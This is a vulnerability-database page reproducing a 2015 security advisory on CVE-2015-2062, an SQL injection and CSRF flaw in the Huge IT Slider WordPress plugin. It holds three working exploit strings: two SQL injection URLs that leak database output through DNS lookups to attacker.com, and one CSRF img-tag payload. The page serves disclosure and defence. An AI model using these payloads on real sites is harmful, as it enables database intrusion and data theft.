Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23250
HistoryFeb 19, 2015 - 12:00 a.m.

SQL Injection in Huge IT Slider WordPress Plugin

2015-02-1900:00:00
High-Tech Bridge
www.htbridge.com
59

EPSS

0.023

Percentile

89.8%

JSON

High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in Huge IT Slider WordPress Plugin. This vulnerability can be exploited by website administrators as well as anonymous attackers to inject and execute arbitrary SQL queries within the applicationโ€™s database.

  1. SQL injection in Huge IT Slider WordPress plugin: CVE-2015-2062

The vulnerability exists due to insufficient filtration of input data passed via the โ€œremoveslideโ€ HTTP GET parameter to โ€œ/wp-admin/admin.phpโ€ script when โ€œtaskโ€ parameter is set to โ€œpopup_postsโ€ or โ€œedit_catโ€. A remote authenticated attacker with administrative privileges can execute arbitrary SQL queries within the applicationโ€™s database.

Below are two simple exploit codes that are based on DNS Exfiltration technique. They can be used if the database of the vulnerable application is hosted on a Windows system. The codes will send a DNS request requesting IP address for version() (or any other sensitive output from the database) subdomain of โ€œ.attacker.comโ€ (a domain name, DNS server of which is controlled by the attacker).

1. Exploit example for โ€œtask=popup_postsโ€: http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=popup_post s&id=1&removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) โ€“

2. Exploit example for โ€œtask=edit_catโ€: http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=edit_cat&i d=1&removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) โ€“

This vulnerability can be also exploited remotely by non-authenticated attackers using CSRF vector, since the web application is also prone to Cross-Site Request Forgery attacks. The attacker could use the following exploit code against authenticated website administrator to determine version of installed MySQL server:

<img src=โ€œhttp://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=popup _posts&id=1&removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) --โ€>

Related

cvelist 1
zdt 1
wpvulndb 1
packetstorm 1
securityvulns 2
prion 1
nvd 1
cve 1
cvelist
cvelist
CVE-2015-2062
2020-02-08 17:08:14
zdt
zdt
WordPress Huge IT Slider 2.6.8 SQL Injection Vulnerability
2015-03-12 00:00:00
wpvulndb
wpvulndb
Huge IT Slider <= 2.6.8 - SQL Injection
2015-02-19 00:00:00
packetstorm
packetstorm
WordPress Huge IT Slider 2.6.8 SQL Injection
2015-03-12 00:00:00
securityvulns
securityvulns
SQL Injection in Huge IT Slider WordPress Plugin
2015-03-23 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2015-03-23 00:00:00
prion
prion
Sql injection
2020-02-08 18:15:00
nvd
nvd
CVE-2015-2062
2020-02-08 18:15:11
cve
cve
CVE-2015-2062
2020-02-08 18:15:11

EPSS

0.023

Percentile

89.8%

JSON
Related for HTB23250
cvelist1zdt1wpvulndb1packetstorm1securityvulns2prion1nvd1cve1